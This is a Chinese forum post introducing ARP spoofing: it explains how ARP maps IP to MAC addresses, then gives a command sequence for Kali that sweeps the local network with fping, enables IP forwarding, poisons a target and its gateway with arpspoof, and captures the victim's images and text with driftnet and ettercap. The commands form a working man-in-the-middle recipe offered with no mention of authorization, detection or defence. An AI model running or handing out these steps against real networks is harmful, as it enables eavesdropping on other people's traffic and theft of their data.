信息安全之 --arp 欺骗入门

本贴最后更新于 1938 天前,其中的信息可能已经时移俗易

基本概念

ARP(Address Resolution Protocol)地址转换协议,工作在OSI模型的数据链路层,在以太网中,网络设备之间互相通信是用MAC地址而不是IP地址,ARP协议就是用来把IP地址转换为MAC地址的。而RARP和ARP相反,它是反向地址转换协议,把MAC地址转换为IP地址。

假设 A(192.168.1.2)与 B(192.168.1.3)在同一局域网,A 要和 B 实现通信。A 首先会发送一个数据包到广播地址(192.168.1.255),该数据包中包含了源 IP(A)、源 MAC、目的 IP(B)、目的 MAC,这个数据包会被发放给局域网中所有的主机,但是只有 B 主机会回复一个包含了源 IP(B)、源 MAC、目的 IP(A)、目的 MAC 的数据包给 A,同时 A 主机会将返回的这个地址保存在 ARP 缓存表中。

前提要素

  • kali 系统主机
  • 目标主机
  • 以上两台主机在同一局域网段

所需必要信息

  • 目标主机 ip
  • 本机 ip
  • 所在网关

获取必要信息

获取目标主机 ip

打开命令行工具切换到 root 用户
**fping参数介绍**

1、命令参数man、-h、--htlp等方式查看使用方法。

常用参数介绍

    -a 只显示出存活的主机参数

    -u 只显示出不存活的主机参数

通过标准输入方式fping +IP1 +IP2 ....

    -g 支持主极端的方式 192.168.1.1 192.168.1.155    或者    192.168.1.0/24

fping -g 192.168.1.0/24

选定ip后继续查看本机ip信息

ifconfig

开启本机ip转发

echo 1 > /proc/sys/net/ipv4/ip_forward

查看是否设置成功

cat /proc/sys/net/ipv4/ip_forward
如果回显是 1 表示开启转发成功

执行arpspoof命令 
后面接上与网络有关的-i(interface) 
网卡eth0 
目标-t(target) 
目标IP:192.168.1.112 
目标主机网关192.168.1.1 
注意:如果是WiFi 网络 将 网关 和 目标 ip 互换

arpspoof -i eth0 -t 192.168.1.112 192.168.1.1
开启 arp 转发后就可以进行流量监听了

图片监听
driftnet -i eth0
文本监听
ettercap -Tq -i eth0

  • 安全

    安全永远都不是一个小问题。

    189 引用 • 813 回帖
  • ARP
    4 引用

相关帖子

欢迎来到这里!

我们正在构建一个小众社区,大家在这里相互信任,以平等 • 自由 • 奔放的价值观进行分享交流。最终,希望大家能够找到与自己志同道合的伙伴,共同成长。

注册 关于
请输入回帖内容 ...